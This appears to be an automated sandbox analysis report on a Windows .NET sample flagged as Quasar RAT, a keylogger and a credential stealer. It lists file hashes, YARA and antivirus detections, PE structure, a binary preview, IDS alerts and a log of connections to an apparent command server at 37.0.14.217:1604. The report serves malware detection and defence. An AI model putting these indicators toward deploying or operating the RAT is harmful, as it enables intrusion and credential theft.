                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:modified
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Users\user\AppData\Roaming\UPX\Client.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):224
                                      Entropy (8bit):7.006804419680568
                                      Encrypted:false
                                      SSDEEP:6:dZajRjF6H0MkaFtCg4VDDjCgN8GzCaZib/eaW6Qhfn:3o3laFtCzHzQBGp
                                      MD5:A2DFC5C17462FC79B88F0AD0A33C70AA
                                      SHA1:C551D06C3E83E7D111A4214F6939CE3D7242FACE
                                      SHA-256:15711AE5DA47EE7119AA7B7D3A6A12B8F435E555FFBA2621B5DD47AC2DB43836
                                      SHA-512:3835D26B300E76D9AFA728A848FDDBC32BC51D3383AA5DF64E3E116527D955727F4B5621D0BA07C6DA0D63B3CAB7228815BBA8AE6A2C0FAF8884DEC8043CA4DE
                                      Malicious:false
                                      Preview:{g...yB,..@.#..^s..8...].-..Q.pC.4u..%D.u......>w. ..Iz....j.H.J$B.^Gg}.]...w........(B@...y.D...KL...u(..dY4..o~I8..H^t.D..,.Ds.y...[.ol..E.v..Z#....j(....k....?.Z.v8:.`I...).J+.........~s_.....>.O.........[}...X.
                                      Process:C:\Users\user\Desktop\JeCXrQSehB.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):547328
                                      Entropy (8bit):6.443846292116182
                                      Encrypted:false
                                      SSDEEP:6144:l8fGABIgrx8kFYLTiMkbMaOcXL/Tb88ASigvCcD+6cfsfiTDpxUKl3Gy3V8/GV0S:EPx7FYPiMNA/flvCcqTsfGpxLl+u
                                      MD5:17E6BFFAFF1EA223913DEB1BC78E74AE
                                      SHA1:67DAF17F3C8F6D2169B24F9A3698921991BBBA2F
                                      SHA-256:AF1D446BB3ABC47B5EACB7A00EBB1992BE1C464CAC5B0E4283B12F0500C3AD4E
                                      SHA-512:72086BDD67CE5C778A625D37D7069200747B70193742AFEE986EC3D58B3A4A5C95B206C91997FAF5D3E46E7AB379955DB5F033A8B10A4A4899FF6E6068C60AB6
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: Florian Roth
                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: Florian Roth
                                      • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: Florian Roth
                                      • Rule: xRAT_1, Description: Detects Patchwork malware, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: Florian Roth
                                      • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: Florian Roth
                                      • Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: Florian Roth
                                      • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: Florian Roth
                                      • Rule: CN_disclosed_20180208_KeyLogger_1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: Florian Roth
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: Joe Security
                                      • Rule: JoeSecurity_Vermin, Description: Yara detected Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_DisableWinDefender, Description: Detects executables containing artifcats associated with disabling Widnows Defender, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: ditekSHen
                                      • Rule: MALWARE_Win_QuasarRAT, Description: QuasarRAT payload, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: ditekSHen
                                      • Rule: Windows_Trojan_Quasarrat_e52df647, Description: unknown, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: unknown
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 96%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s!c.................N..........>l... ........@.. ....................................@..................................k..S.................................................................................... ............... ..H............text...DL... ...N.................. ..`.rsrc................P..............@..@.reloc...............X..............@..B................ l......H.......... .......h....Q...J...........................................0..........(....r...p(....s....%r...po....%ro..po....%r...po....%ro..po....%r...po....%r...p.r...p(....o....%r...po....o....(....r...p(.....s....%.o....%.o....%.o....%.o....%.o....(....&..&..*....................0..........(....r*..p(....s....%r...po....%ro..po....%r...po....%ro..po....%r...po....%r...p.r...p(....o....%r:..po....o....(....r*..p(.....s....%.o....%.o....%.o....%.o....%.o....(....&..&..*...
                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):6.443846292116182
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Windows Screen Saver (13104/52) 0.07%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      File name:JeCXrQSehB.exe
                                      File size:547328
                                      MD5:17e6bffaff1ea223913deb1bc78e74ae
                                      SHA1:67daf17f3c8f6d2169b24f9a3698921991bbba2f
                                      SHA256:af1d446bb3abc47b5eacb7a00ebb1992be1c464cac5b0e4283b12f0500c3ad4e
                                      SHA512:72086bdd67ce5c778a625d37d7069200747b70193742afee986ec3d58b3a4a5c95b206c91997faf5d3e46e7ab379955db5f033a8b10a4a4899ff6e6068c60ab6
                                      SSDEEP:6144:l8fGABIgrx8kFYLTiMkbMaOcXL/Tb88ASigvCcD+6cfsfiTDpxUKl3Gy3V8/GV0S:EPx7FYPiMNA/flvCcqTsfGpxLl+u
                                      TLSH:73C47C1473E48E5BE2BE1B7EE1354A119B71BC4677A6F74F0E85A0AD2C223458C41BE3
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s!c.................N..........>l... ........@.. ....................................@................................
                                      Icon Hash:00828e8e8686b000
                                      Entrypoint:0x486c3e
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x6321738B [Wed Sep 14 06:24:11 2022 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x86be80x53.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x880000x800.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x8a0000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000x84c440x84e00False0.5022856890874883data6.450968305279707IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0x880000x8000x800False0.4208984375data4.846905971859522IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x8a0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountry
                                      RT_VERSION0x880900x2dcdata
                                      RT_MANIFEST0x8837c0x478exported SGML document, Unicode text, UTF-8 (with BOM) text
                                      DLLImport
                                      mscoree.dll_CorExeMain
                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                      192.168.2.7208.95.112.149700802036383 10/15/22-08:26:57.685861TCP2036383ET TROJAN Common RAT Connectivity Check Observed4970080192.168.2.7208.95.112.1
                                      192.168.2.7208.95.112.149697802036383 10/15/22-08:26:51.006464TCP2036383ET TROJAN Common RAT Connectivity Check Observed4969780192.168.2.7208.95.112.1
                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 15, 2022 08:26:50.960673094 CEST4969780192.168.2.7208.95.112.1
                                      Oct 15, 2022 08:26:50.997414112 CEST8049697208.95.112.1192.168.2.7
                                      Oct 15, 2022 08:26:50.997607946 CEST4969780192.168.2.7208.95.112.1
                                      Oct 15, 2022 08:26:51.006464005 CEST4969780192.168.2.7208.95.112.1
                                      Oct 15, 2022 08:26:51.045681953 CEST8049697208.95.112.1192.168.2.7
                                      Oct 15, 2022 08:26:51.103084087 CEST4969780192.168.2.7208.95.112.1
                                      Oct 15, 2022 08:26:57.638533115 CEST4970080192.168.2.7208.95.112.1
                                      Oct 15, 2022 08:26:57.674974918 CEST8049700208.95.112.1192.168.2.7
                                      Oct 15, 2022 08:26:57.675888062 CEST4970080192.168.2.7208.95.112.1
                                      Oct 15, 2022 08:26:57.685861111 CEST4970080192.168.2.7208.95.112.1
                                      Oct 15, 2022 08:26:57.722738981 CEST8049700208.95.112.1192.168.2.7
                                      Oct 15, 2022 08:26:57.806627035 CEST4970080192.168.2.7208.95.112.1
                                      Oct 15, 2022 08:27:03.384758949 CEST497011604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:03.411931992 CEST16044970137.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:03.994764090 CEST497011604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:04.024317980 CEST16044970137.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:04.604166985 CEST497011604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:04.631490946 CEST16044970137.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:10.578982115 CEST497021604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:10.606117964 CEST16044970237.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:11.238914967 CEST497021604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:11.267062902 CEST16044970237.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:11.807857990 CEST497021604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:11.835524082 CEST16044970237.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:16.174729109 CEST497031604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:16.201956034 CEST16044970337.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:16.886404037 CEST497031604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:16.914848089 CEST16044970337.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:17.573942900 CEST497031604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:17.601097107 CEST16044970337.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:21.955929995 CEST497041604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:21.983113050 CEST16044970437.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:22.496325016 CEST497041604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:22.523400068 CEST16044970437.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:23.074426889 CEST497041604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:23.101505041 CEST16044970437.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:25.843765974 CEST8049697208.95.112.1192.168.2.7
                                      Oct 15, 2022 08:27:27.199711084 CEST497051604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:27.228012085 CEST16044970537.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:27.787595034 CEST497051604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:27.814860106 CEST16044970537.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:28.496830940 CEST497051604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:28.524111986 CEST16044970537.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:32.590420961 CEST497061604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:32.617724895 CEST16044970637.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:33.309665918 CEST497061604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:33.337743044 CEST16044970637.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:33.997246027 CEST497061604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:34.024741888 CEST16044970637.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:38.106920004 CEST497071604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:38.134133101 CEST16044970737.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:38.638262987 CEST497071604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:38.665344000 CEST16044970737.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:39.169609070 CEST497071604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:39.196621895 CEST16044970737.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:43.561434984 CEST497081604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:43.588654995 CEST16044970837.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:44.091926098 CEST497081604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:44.119430065 CEST16044970837.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:44.623167992 CEST497081604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:44.650393009 CEST16044970837.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:48.732448101 CEST497091604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:48.759643078 CEST16044970937.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:49.311084032 CEST497091604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:49.338336945 CEST16044970937.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:49.998600006 CEST497091604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:50.025638103 CEST16044970937.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:54.196994066 CEST497101604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:54.224009037 CEST16044971037.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:54.811538935 CEST497101604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:54.838381052 CEST16044971037.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:55.499157906 CEST497101604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:27:55.526065111 CEST16044971037.0.14.217192.168.2.7
                                      Oct 15, 2022 08:27:58.090131044 CEST8049700208.95.112.1192.168.2.7
                                      Oct 15, 2022 08:28:00.275510073 CEST497111604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:00.303858995 CEST16044971137.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:00.859009981 CEST497111604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:00.886574030 CEST16044971137.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:01.568815947 CEST497111604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:01.596290112 CEST16044971137.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:05.327452898 CEST497121604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:05.355031013 CEST16044971237.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:05.859353065 CEST497121604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:05.886641979 CEST16044971237.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:06.562685966 CEST497121604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:06.590349913 CEST16044971237.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:10.694488049 CEST497131604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:10.721596003 CEST16044971337.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:11.312930107 CEST497131604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:11.340270042 CEST16044971337.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:11.906902075 CEST497131604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:11.934130907 CEST16044971337.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:16.112504005 CEST497141604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:16.139513969 CEST16044971437.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:16.813436031 CEST497141604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:16.840598106 CEST16044971437.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:17.500967026 CEST497141604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:17.528059959 CEST16044971437.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:21.739387035 CEST497151604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:21.766830921 CEST16044971537.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:22.360794067 CEST497151604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:22.388148069 CEST16044971537.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:22.954623938 CEST497151604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:22.981966972 CEST16044971537.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:27.504987001 CEST497161604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:27.532325983 CEST16044971637.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:28.065180063 CEST497161604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:28.093971968 CEST16044971637.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:28.753751993 CEST497161604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:28.780960083 CEST16044971637.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:33.297184944 CEST497171604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:33.325093985 CEST16044971737.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:34.002405882 CEST497171604192.168.2.737.0.14.217
                                      Oct 15, 2022 08:28:34.029789925 CEST16044971737.0.14.217192.168.2.7
                                      Oct 15, 2022 08:28:34.611804008 CEST497171604192.168.2.737.0.14.217
